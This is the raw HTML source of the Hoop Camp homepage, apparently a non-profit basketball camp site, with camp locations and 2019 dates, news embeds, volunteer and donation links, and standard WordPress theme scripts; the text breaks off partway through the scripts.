href="https://www.hoop.camp/portland/jesuit-high-school-football-camp/">Jesuit High School Football Camp</a></li> <li class="page_item page-item-215341"><a href="https://www.hoop.camp/portland/registration/">Registration</a></li> <li class="page_item page-item-215340"><a href="https://www.hoop.camp/portland/registration-success-2/">Registration Success</a></li> </ul> </li> <li class="page_item page-item-215631 page_item_has_children"><a href="https://www.hoop.camp/puertovallarta/">Puerto Vallarta</a> <ul class='children'> <li class="page_item page-item-215790"><a href="https://www.hoop.camp/puertovallarta/basketball-in-paradise/">Basketball in Paradise</a></li> <li class="page_item page-item-215633"><a href="https://www.hoop.camp/puertovallarta/camp-information/">Camp Information</a></li> <li class="page_item page-item-215635"><a href="https://www.hoop.camp/puertovallarta/gallery/">Gallery</a></li> <li class="page_item page-item-215637"><a href="https://www.hoop.camp/puertovallarta/registration/">Registration</a></li> <li class="page_item page-item-215639"><a href="https://www.hoop.camp/puertovallarta/registration-success/">Registration Success</a></li> </ul> </li> <li class="page_item page-item-215561 page_item_has_children"><a href="https://www.hoop.camp/saltlake/">Salt Lake City</a> <ul class='children'> <li class="page_item page-item-215563"><a href="https://www.hoop.camp/saltlake/camp-information/">Camp Information</a></li> <li class="page_item page-item-215565"><a href="https://www.hoop.camp/saltlake/gallery/">Gallery</a></li> <li class="page_item page-item-215567"><a href="https://www.hoop.camp/saltlake/registration/">Registration</a></li> <li class="page_item page-item-215569"><a href="https://www.hoop.camp/saltlake/registration-success/">Registration Success</a></li> <li class="page_item page-item-215743 page_item_has_children"><a href="https://www.hoop.camp/saltlake/university-of-utah-camp/">University of Utah Camp</a> <ul class='children'> <li class="page_item page-item-223178"><a href="https://www.hoop.camp/saltlake/university-of-utah-camp/university-of-utah-football-camp/">University of Utah Football Camp</a></li> </ul> </li> </ul> </li> <li class="cat-item cat-item-1"><a href="https://www.hoop.camp/category/uncategorized/" >Uncategorized</a> </li> </ul> </nav> <div id="et_top_search"> <span id="et_search_icon"></span> </div> <div id="et_mobile_nav_menu"> <div class="mobile_nav closed"> <span class="select_page">Select Page</span> <span class="mobile_menu_bar mobile_menu_bar_toggle"></span> </div> </div> </div> <!-- #et-top-navigation --> </div> <!-- .container --> <div class="et_search_outer"> <div class="container et_search_form_container"> <form role="search" method="get" class="et-search-form" action="https://www.hoop.camp/"> <input type="search" class="et-search-field" placeholder="Search &hellip;" value="" name="s" title="Search for:" /> </form> <span class="et_close_search_field"></span> </div> </div> </header> <!-- #main-header --> <div id="et-main-area"> <div id="main-content"> <article id="post-156" class="post-156 page type-page status-publish hentry"> <div class="entry-content"> <div id="et-boc" class="et-boc"> <div class="et_builder_inner_content et_pb_gutters3"> <div class="et_pb_section et_pb_section_0 et_pb_fullwidth_section et_section_regular"> <div class="et_pb_module et_pb_fullwidth_menu et_pb_fullwidth_menu_0 et_pb_bg_layout_light et_pb_text_align_left et_dropdown_animation_fade"> <div class="et_pb_row clearfix"> <nav class="fullwidth-menu-nav"><ul id="menu-home" class="fullwidth-menu nav"><li id="menu-item-215827" class="et_pb_menu_page_id-215827 menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-215827"><a href="#">Alaska</a> <ul class="sub-menu"> <li id="menu-item-215300" class="et_pb_menu_page_id-215204 menu-item menu-item-type-post_type menu-item-object-page menu-item-215300"><a href="https://www.hoop.camp/anchorage/">Anchorage</a></li> </ul> </li> <li id="menu-item-215830" class="et_pb_menu_page_id-215830 menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-215830"><a href="#">Arizona</a> <ul class="sub-menu"> <li id="menu-item-215628" class="et_pb_menu_page_id-215607 menu-item menu-item-type-post_type menu-item-object-page menu-item-215628"><a href="https://www.hoop.camp/phoenix/">Phoenix</a></li> </ul> </li> <li id="menu-item-215682" class="et_pb_menu_page_id-215666 menu-item menu-item-type-post_type menu-item-object-page menu-item-215682"><a href="https://www.hoop.camp/china/">China</a></li> <li id="menu-item-215828" class="et_pb_menu_page_id-215828 menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-215828"><a href="#">Florida</a> <ul class="sub-menu"> <li id="menu-item-215730" class="et_pb_menu_page_id-215716 menu-item menu-item-type-post_type menu-item-object-page menu-item-215730"><a href="https://www.hoop.camp/miami/">Miami</a></li> </ul> </li> <li id="menu-item-215831" class="et_pb_menu_page_id-215831 menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-215831"><a href="#">Idaho</a> <ul class="sub-menu"> <li id="menu-item-215301" class="et_pb_menu_page_id-214963 menu-item menu-item-type-post_type menu-item-object-page menu-item-215301"><a href="https://www.hoop.camp/pocatello/">Pocatello</a></li> </ul> </li> <li id="menu-item-215833" class="et_pb_menu_page_id-215833 menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-215833"><a href="#">Mexico</a> <ul class="sub-menu"> <li id="menu-item-215870" class="et_pb_menu_page_id-215790 menu-item menu-item-type-post_type menu-item-object-page menu-item-215870"><a href="https://www.hoop.camp/puertovallarta/basketball-in-paradise/">Basketball in Paradise</a></li> <li id="menu-item-215641" class="et_pb_menu_page_id-215631 menu-item menu-item-type-post_type menu-item-object-page menu-item-215641"><a href="https://www.hoop.camp/puertovallarta/">Puerto Vallarta</a></li> </ul> </li> <li id="menu-item-215832" class="et_pb_menu_page_id-215832 menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-215832"><a href="#">Oregon</a> <ul class="sub-menu"> <li id="menu-item-215347" class="et_pb_menu_page_id-215337 menu-item menu-item-type-post_type menu-item-object-page menu-item-215347"><a href="https://www.hoop.camp/portland/">Portland</a></li> </ul> </li> <li id="menu-item-215825" class="et_pb_menu_page_id-215825 menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-215825"><a href="#">Utah</a> <ul class="sub-menu"> <li id="menu-item-215584" class="et_pb_menu_page_id-215561 menu-item menu-item-type-post_type menu-item-object-page menu-item-215584"><a href="https://www.hoop.camp/saltlake/">Salt Lake City</a></li> <li id="menu-item-223208" class="et_pb_menu_page_id-223178 menu-item menu-item-type-post_type menu-item-object-page menu-item-223208"><a href="https://www.hoop.camp/saltlake/university-of-utah-camp/university-of-utah-football-camp/">University of Utah</a></li> </ul> </li> </ul></nav> <div class="et_mobile_nav_menu"> <a href="#" class="mobile_nav closed"> <span class="mobile_menu_bar"></span> </a> </div> </div> </div> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_1 header_3_f falkor header_home2_3_f et_pb_section_video et_pb_preload et_pb_with_background et_section_regular"> <span class="et_pb_section_video_bg"> <video loop="loop" autoplay playsinline muted width="100"> <source type="video/mp4" src="https://www.hoop.camp/wp-content/uploads/2019/04/Hoop-Camp-Web-Home-2.mp4" /> </video> </span> <div class="et_pb_row et_pb_row_0 lines"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_0 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_cta_0 et_pb_promo et_pb_bg_layout_dark et_pb_text_align_left et_pb_no_bg"> <div class="et_pb_promo_description"> <h2 class="et_pb_module_header">HOOP CAMP</h2> A life-changing experience. </div> </div><div class="et_pb_module et_pb_cta_1 top_line et_pb_promo et_pb_bg_layout_dark et_pb_text_align_center et_pb_no_bg"> <div class="et_pb_promo_description"> &nbsp; </div> </div><div class="et_pb_module et_pb_cta_2 left_line et_pb_promo et_pb_bg_layout_dark et_pb_text_align_center et_pb_no_bg"> <div class="et_pb_promo_description"> &nbsp; </div> </div><div class="et_pb_module et_pb_cta_3 right_line right_line_1 et_pb_promo et_pb_bg_layout_dark et_pb_text_align_center et_pb_no_bg"> <div class="et_pb_promo_description"> &nbsp; </div> </div><div class="et_pb_module et_pb_cta_4 right_line right_line_2 et_pb_promo et_pb_bg_layout_dark et_pb_text_align_center et_pb_no_bg"> <div class="et_pb_promo_description"> &nbsp; </div> </div><div class="et_pb_module et_pb_cta_5 bottom_line et_pb_promo et_pb_bg_layout_dark et_pb_text_align_center et_pb_no_bg"> <div class="et_pb_promo_description"> &nbsp; </div> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_1 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_0 et_animated et-waypoint et_always_center_on_mobile"> <span class="et_pb_image_wrap "><img src="https://www.hoop.camp/wp-content/uploads/2018/05/Hoop-camp-logo.png" alt="" /></span> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_2 blurb_19_f falkor et_pb_with_background et_section_regular"> <div class="et_pb_row et_pb_row_1"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_2 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_0 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h1 style="text-align: center;">OUR LOCATIONS</h1> </div> </div> <!-- .et_pb_text --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_2 et_pb_gutters2"> <div class="et_pb_column et_pb_column_1_3 et_pb_column_3 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_blurb et_pb_blurb_0 blue_lines et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_top"> <div class="et_pb_blurb_content"> <div class="et_pb_main_blurb_image"><a href="https://www.hoop.camp/portland/"><span class="et_pb_image_wrap"><img src="https://www.hoop.camp/wp-content/uploads/2019/02/Hoop-Camp-Portland-Basketball.jpg" alt="" class="et-waypoint et_pb_animation_off" /></span></a></div> <div class="et_pb_blurb_container"> <h2 class="et_pb_module_header"><a href="https://www.hoop.camp/portland/">Portland, Oregon</a></h2> <div class="et_pb_blurb_description"> <p><em>June 27 &#8211; 29, 2019</em></p> </div><!-- .et_pb_blurb_description --> </div> </div> <!-- .et_pb_blurb_content --> </div> <!-- .et_pb_blurb --><div class="et_pb_button_module_wrapper et_pb_button_0_wrapper et_pb_button_alignment_ et_pb_module "> <a class="et_pb_button et_pb_custom_button_icon et_pb_button_0 et_hover_enabled et_pb_bg_layout_light" href="https://www.hoop.camp/portland/" data-icon="&#x24;">Camp Info</a> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_3 et_pb_column_4 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_blurb et_pb_blurb_1 blue_lines et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_top"> <div class="et_pb_blurb_content"> <div class="et_pb_main_blurb_image"><a href="/pocatello"><span class="et_pb_image_wrap"><img src="https://www.hoop.camp/wp-content/uploads/2018/05/Pocatello2017_HoopCamp_IMG_4017.jpg" alt="" class="et-waypoint et_pb_animation_off" /></span></a></div> <div class="et_pb_blurb_container"> <h2 class="et_pb_module_header"><a href="/pocatello">Pocatello, Idaho</a></h2> <div class="et_pb_blurb_description"> <p><em>July 27, 2019</em></p> </div><!-- .et_pb_blurb_description --> </div> </div> <!-- .et_pb_blurb_content --> </div> <!-- .et_pb_blurb --><div class="et_pb_button_module_wrapper et_pb_button_1_wrapper et_pb_button_alignment_ et_pb_module "> <a class="et_pb_button et_pb_custom_button_icon et_pb_button_1 et_hover_enabled et_pb_bg_layout_light" href="/pocatello" data-icon="&#x24;">Camp Info</a> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_3 et_pb_column_5 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_blurb et_pb_blurb_2 blue_lines et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_top"> <div class="et_pb_blurb_content"> <div class="et_pb_main_blurb_image"><a href="/anchorage"><span class="et_pb_image_wrap"><img src="https://www.hoop.camp/wp-content/uploads/2019/02/Hoop-Camp-Anchorage-Basketball.jpg" alt="" class="et-waypoint et_pb_animation_off" /></span></a></div> <div class="et_pb_blurb_container"> <h2 class="et_pb_module_header"><a href="/anchorage">Anchorage, Alaska</a></h2> <div class="et_pb_blurb_description"> <p>March 30-31, 2019</p> </div><!-- .et_pb_blurb_description --> </div> </div> <!-- .et_pb_blurb_content --> </div> <!-- .et_pb_blurb --><div class="et_pb_button_module_wrapper et_pb_button_2_wrapper et_pb_button_alignment_ et_pb_module "> <a class="et_pb_button et_pb_custom_button_icon et_pb_button_2 et_hover_enabled et_pb_bg_layout_light" href="/anchorage" data-icon="&#x24;">Camp Info</a> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_3 et_pb_gutters2"> <div class="et_pb_column et_pb_column_1_3 et_pb_column_6 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_blurb et_pb_blurb_3 blue_lines et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_top"> <div class="et_pb_blurb_content"> <div class="et_pb_main_blurb_image"><a href="https://www.hoop.camp/puertovallarta/"><span class="et_pb_image_wrap"><img src="https://www.hoop.camp/wp-content/uploads/2018/05/Pocatello2017_HoopCamp_IMG_6934.jpg" alt="" class="et-waypoint et_pb_animation_off" /></span></a></div> <div class="et_pb_blurb_container"> <h2 class="et_pb_module_header"><a href="https://www.hoop.camp/puertovallarta/">Mexico</a></h2> <div class="et_pb_blurb_description"> <p><em>May 3-10, 2019</em></p> </div><!-- .et_pb_blurb_description --> </div> </div> <!-- .et_pb_blurb_content --> </div> <!-- .et_pb_blurb --><div class="et_pb_button_module_wrapper et_pb_button_3_wrapper et_pb_button_alignment_ et_pb_module "> <a class="et_pb_button et_pb_custom_button_icon et_pb_button_3 et_hover_enabled et_pb_bg_layout_light" href="#" data-icon="&#x24;">Camp Info</a> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_3 et_pb_column_7 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_blurb et_pb_blurb_4 blue_lines et_clickable et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_top"> <div class="et_pb_blurb_content"> <div class="et_pb_main_blurb_image"><a href="https://www.hoop.camp/china/"><span class="et_pb_image_wrap"><img src="https://www.hoop.camp/wp-content/uploads/2018/05/IMG_2192.jpg" alt="" class="et-waypoint et_pb_animation_off" /></span></a></div> <div class="et_pb_blurb_container"> <h2 class="et_pb_module_header"><a href="https://www.hoop.camp/china/">China</a></h2> <div class="et_pb_blurb_description"> <p>Dates TBA</p> </div><!-- .et_pb_blurb_description --> </div> </div> <!-- .et_pb_blurb_content --> </div> <!-- .et_pb_blurb --><div class="et_pb_module et_pb_blurb et_pb_blurb_5 blue_lines et_clickable et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_top"> <div class="et_pb_blurb_content"> <div class="et_pb_main_blurb_image"><a href="https://www.hoop.camp/china/"><span class="et_pb_image_wrap"><img src="https://cdn.images.insidelacrosse.com/auto/0916/57eaac88e5583/900x600/57eaac88e5583.jpg" alt="" class="et-waypoint et_pb_animation_off" /></span></a></div> <div class="et_pb_blurb_container"> <h2 class="et_pb_module_header"><a href="https://www.hoop.camp/china/">University of Utah</a></h2> <div class="et_pb_blurb_description"> <p>Football Clinic<br />June 2019: TBA</p> </div><!-- .et_pb_blurb_description --> </div> </div> <!-- .et_pb_blurb_content --> </div> <!-- .et_pb_blurb --><div class="et_pb_button_module_wrapper et_pb_button_4_wrapper et_pb_button_alignment_ et_pb_module "> <a class="et_pb_button et_pb_custom_button_icon et_pb_button_4 et_hover_enabled et_pb_bg_layout_light" href="#" data-icon="&#x24;">Camp Info</a> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_3 et_pb_column_8 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_blurb et_pb_blurb_6 blue_lines et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_top"> <div class="et_pb_blurb_content"> <div class="et_pb_main_blurb_image"><a href="https://www.hoop.camp/saltlake/"><span class="et_pb_image_wrap"><img src="https://www.hoop.camp/wp-content/uploads/2019/02/Hoop-Camp-Portland-Basketball4.jpg" alt="" class="et-waypoint et_pb_animation_off" /></span></a></div> <div class="et_pb_blurb_container"> <h2 class="et_pb_module_header"><a href="https://www.hoop.camp/saltlake/">Salt Lake City, Utah</a></h2> <div class="et_pb_blurb_description"> <p>April 13 &amp; June 8</p> </div><!-- .et_pb_blurb_description --> </div> </div> <!-- .et_pb_blurb_content --> </div> <!-- .et_pb_blurb --><div class="et_pb_button_module_wrapper et_pb_button_5_wrapper et_pb_button_alignment_ et_pb_module "> <a class="et_pb_button et_pb_custom_button_icon et_pb_button_5 et_hover_enabled et_pb_bg_layout_light" href="#" data-icon="&#x24;">Camp Info</a> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_4"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_9 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_1 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h1 style="text-align: center;">IN THE NEWS</h1> </div> </div> <!-- .et_pb_text --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_5"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_10 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_code et_pb_code_0"> <div class="et_pb_code_inner"> <iframe width="640" height="360" frameborder="0" marginheight="0" marginwidth="0" src="https://katu.com/embed/news/local/everyday-hero-hoop-camp-founder-steve-garrity-teaches-basketball-and-much-more?external-id=7fb81f069aa1408d9956033fbf2cfd92"></iframe> </div> <!-- .et_pb_code_inner --> </div> <!-- .et_pb_code --> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_11 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_code et_pb_code_1"> <div class="et_pb_code_inner"> <iframe width="640" height="360" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/480439371&color=%23ff5500&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true&visual=true"></iframe> </div> <!-- .et_pb_code_inner --> </div> <!-- .et_pb_code --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_4 falkor-cta-3 et_pb_with_background et_pb_section_parallax et_section_regular"> <div class="et_parallax_bg" style="background-image: url(https://www.hoop.camp/wp-content/uploads/2018/05/Pocatello2017_HoopCamp_IMG_4053-3.jpg);"></div> <div class="et_pb_row et_pb_row_6"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_12 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_cta_6 et_hover_enabled et_pb_promo et_pb_bg_layout_light et_pb_text_align_center et_pb_no_bg"> <div class="et_pb_promo_description"> <h2 class="et_pb_module_header">You can make a difference, too.</h2> <p>Come volunteer with the Hoop Camp team for an experience you'll never forget.</p> </div> <div class="et_pb_button_wrapper"><a class="et_pb_button et_pb_promo_button" href="https://www.hoop.camp/get-involved/">Get Involved</a></div> </div><div class="et_pb_module et_pb_cta_7 et_hover_enabled et_pb_promo et_pb_bg_layout_dark et_pb_text_align_center et_pb_no_bg"> <div class="et_pb_promo_description"> </div> <div class="et_pb_button_wrapper"><a class="et_pb_button et_pb_promo_button" href="https://www.hoop.camp/donate/">Donate</a></div> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_6 footer_4_f falkor white_links footer_home2_4_f et_pb_with_background et_section_regular"> <div class="et_pb_row et_pb_row_7 lines et_pb_equal_columns et_pb_gutters2"> <div class="et_pb_column et_pb_column_1_3 et_pb_column_13 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_blurb et_pb_blurb_7 et_pb_bg_layout_light et_pb_text_align_left et_pb_blurb_position_left"> <div class="et_pb_blurb_content"> <div class="et_pb_main_blurb_image"><a href="https://www.hoop.camp/contact/"><span class="et_pb_image_wrap"><img src="https://www.hoop.camp/wp-content/uploads/2018/04/icon-03.png" alt="" class="et-waypoint et_pb_animation_off" /></span></a></div> <div class="et_pb_blurb_container"> <h4 class="et_pb_module_header"><a href="https://www.hoop.camp/contact/">Contact Us</a></h4> <div class="et_pb_blurb_description"> <p>We're excited to hear from you and answer any questions you may have.</p> </div><!-- .et_pb_blurb_description --> </div> </div> <!-- .et_pb_blurb_content --> </div> <!-- .et_pb_blurb --> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_3 et_pb_column_14 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_blurb et_pb_blurb_8 et_pb_bg_layout_light et_pb_text_align_left et_pb_blurb_position_left"> <div class="et_pb_blurb_content"> <div class="et_pb_main_blurb_image"><a href="https://www.facebook.com/HoopCamp/"><span class="et_pb_image_wrap"><img src="https://www.hoop.camp/wp-content/uploads/2018/04/blurb-16-image3.png" alt="" class="et-waypoint et_pb_animation_off" /></span></a></div> <div class="et_pb_blurb_container"> <h4 class="et_pb_module_header"><a href="https://www.facebook.com/HoopCamp/">Follow Us</a></h4> <div class="et_pb_blurb_description"> <p>Keep up on the latest and greatest on our <a title="Check out our Facebook" href="https://www.facebook.com/HoopCamp/" target="_blank" rel="noopener noreferrer">Facebook</a> page!</p> </div><!-- .et_pb_blurb_description --> </div> </div> <!-- .et_pb_blurb_content --> </div> <!-- .et_pb_blurb --> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_3 et_pb_column_15 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_blurb et_pb_blurb_9 et_pb_bg_layout_light et_pb_text_align_left et_pb_blurb_position_left"> <div class="et_pb_blurb_content"> <div class="et_pb_main_blurb_image"><a href="https://www.hoop.camp/get-involved/"><span class="et_pb_image_wrap"><img src="https://www.hoop.camp/wp-content/uploads/2018/04/falkor-numbers2-icon3.png" alt="" class="et-waypoint et_pb_animation_off" /></span></a></div> <div class="et_pb_blurb_container"> <h4 class="et_pb_module_header"><a href="https://www.hoop.camp/get-involved/">Get Involved</a></h4> <div class="et_pb_blurb_description"> <p>As a non-profit organization, we can't do this without help. Consider volunteering or <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&amp;hosted_button_id=A9M6JZD6ZPK8N&amp;source=url">donating</a> today.</p> </div><!-- .et_pb_blurb_description --> </div> </div> <!-- .et_pb_blurb_content --> </div> <!-- .et_pb_blurb --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_8 et_pb_gutters1 et_pb_row_fullwidth"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_16 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_text et_pb_text_2 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <a href="#">Terms &amp; Conditions</a> | <a href="#">Privacy</a> | <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=A9M6JZD6ZPK8N&source=url">Donate</a></p> </div> </div> <!-- .et_pb_text --> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_17 et_pb_css_mix_blend_mode_passthrough"> <ul class="et_pb_module et_pb_social_media_follow et_pb_social_media_follow_0 clearfix et_pb_bg_layout_light "> <li class='et_pb_social_media_follow_network_0 et_pb_social_icon et_pb_social_network_link et-social-twitter et_pb_social_media_follow_network_0'><a href='#' class='icon et_pb_with_border' title='Follow on Twitter' ><span class='et_pb_social_media_follow_network_name' aria-hidden='true' >Follow</span></a></li><li class='et_pb_social_media_follow_network_1 et_pb_social_icon et_pb_social_network_link et-social-facebook et_pb_social_media_follow_network_1'><a href='https://www.facebook.com/HoopCamp/' class='icon et_pb_with_border' title='Follow on Facebook' ><span class='et_pb_social_media_follow_network_name' aria-hidden='true' >Follow</span></a></li> </ul> <!-- .et_pb_counters --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --> </div> </div> </div> <!-- .entry-content --> </article> <!-- .et_pb_post --> </div> <!-- #main-content --> <footer id="main-footer"> <div id="footer-bottom"> <div class="container clearfix"> <ul class="et-social-icons"> <li class="et-social-icon et-social-facebook"> <a href="#" class="icon"> <span>Facebook</span> </a> </li> <li class="et-social-icon et-social-twitter"> <a href="#" class="icon"> <span>Twitter</span> </a> </li> <li class="et-social-icon et-social-google-plus"> <a href="#" class="icon"> <span>Google</span> </a> </li> <li class="et-social-icon et-social-rss"> <a href="https://www.hoop.camp/feed/" class="icon"> <span>RSS</span> </a> </li> </ul><div id="footer-info">Website by <a href="http://www.benpingel.me">Ben Pingel</a></div> </div> <!-- .container --> </div> </footer> <!-- #main-footer --> </div> <!-- #et-main-area --> </div> <!-- #page-container --> <script type="text/javascript"> var et_animation_data = [{"class":"et_pb_image_0","style":"slideRight","repeat":"once","duration":"1000ms","delay":"0ms","intensity":"50%","starting_opacity":"0%","speed_curve":"ease-in-out"}]; var et_link_options_data = [{"class":"et_pb_blurb_4","url":"https:\/\/www.hoop.camp\/china\/","target":"_self"},{"class":"et_pb_blurb_5","url":"https:\/\/www.hoop.camp\/china\/","target":"_self"}]; </script> <link rel='stylesheet' id='mediaelement-css' href='https://www.hoop.camp/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.6-78496d1' type='text/css' media='all' /> <link rel='stylesheet' id='wp-mediaelement-css' href='https://www.hoop.camp/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5.1.1' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var DIVI = {"item_count":"%d Item","items_count":"%d Items"}; var et_shortcodes_strings = {"previous":"Previous","next":"Next"}; var et_pb_custom = {"ajaxurl":"https:\/\/www.hoop.camp\/wp-admin\/admin-ajax.php","images_uri":"https:\/\/www.hoop.camp\/wp-content\/themes\/Divi\/images","builder_images_uri":"https:\/\/www.hoop.camp\/wp-content\/themes\/Divi\/includes\/builder\/images","et_frontend_nonce":"aa0e040c52","subscription_failed":"Please, check the fields below to make sure you entered the correct information.","et_ab_log_nonce":"eff76c4081","fill_message":"Please, fill in the following fields:","contact_error_message":"Please, fix the following errors:","invalid":"Invalid email","captcha":"Captcha","prev":"Prev","previous":"Previous","next":"Next","wrong_captcha":"You entered the wrong number in captcha.","ignore_waypoints":"no","is_divi_theme_used":"1","widget_search_selector":".widget_search","is_ab_testing_active":"","page_id":"156","unique_test_id":"","ab_bounce_rate":"5","is_cache_plugin_active":"yes","is_shortcode_tracking":"","tinymce_uri":""}; var et_pb_box_shadow_elements = []; /* ]]> */ </script> <script type='text/javascript' src='https://www.hoop.camp/wp-content/themes/Divi/js/custom.min.js?ver=3.21.4'></script> <script type='text/javascript' src='https://www.hoop.camp/wp-content/themes/Divi/core/admin/js/common.js?ver=3.21.4'></script> <script type='text/javascript' src='https://www.hoop.camp/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> <script type='text/javascript'> var mejsL10n = {"language":"en","strings":{"mejs.install-flash":"You are using a browser that does not have Flash player enabled or installed. Please turn on your Flash player plugin or download the latest version from https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen-off":"Turn off Fullscreen","mejs.fullscreen-on":"Go Fullscreen","mejs.download-video":"Download Video","mejs.fullscreen":"Fullscreen","mejs.time-jump-forward":["Jump forward 1 second","Jump forward %1 seconds"],"mejs.loop":"Toggle Loop","mejs.play":"Play","mejs.pause":"Pause","mejs.close":"Close","mejs.time-slider":"Time Slider","mejs.time-help-text":"Use Left\/Right Arrow keys to advance one second, Up\/Down arrows to advance ten seconds.","mejs.time-skip-back":["Skip back 1 second","Skip back %1 seconds"],"mejs.captions-subtitles":"Captions\/Subtitles","mejs.captions-chapters":"Chapters","mejs.none":"None","mejs.mute-toggle":"Mute Toggle","mejs.volume-help-text":"Use Up\/Down Arrow keys to increase or decrease volume.","mejs.unmute":"Unmute","mejs.mute":"Mute","mejs.volume-slider":"Volume Slider","mejs.video-player":"Video Player","mejs.audio-player":"Audio Player","mejs.ad-skip":"Skip ad","mejs.ad-skip-info":["Skip in 1 second","Skip in %1 seconds"],"mejs.source-chooser":"Source Chooser","mejs.stop":"Stop","mejs.speed-rate":"Speed Rate","mejs.live-broadcast":"Live Broadcast","mejs.afrikaans":"Afrikaans","mejs.albanian":"Albanian","mejs.arabic":"Arabic","mejs.belarusian":"Belarusian","mejs.bulgarian":"Bulgarian","mejs.catalan":"Catalan","mejs.chinese":"Chinese","mejs.chinese-simplified":"Chinese (Simplified)","mejs.chinese-traditional":"Chinese (Traditional)","mejs.croatian":"Croatian","mejs.czech":"Czech","mejs.danish":"Danish","mejs.dutch":"Dutch","mejs.english":"English","mejs.estonian":"Estonian","mejs.filipino":"Filipino","mejs.finnish":"Finnish","mejs.french":"French","mejs.galician":"Galician","mejs.german":"German","mejs.greek":"Greek","mejs.haitian-creole":"Haitian 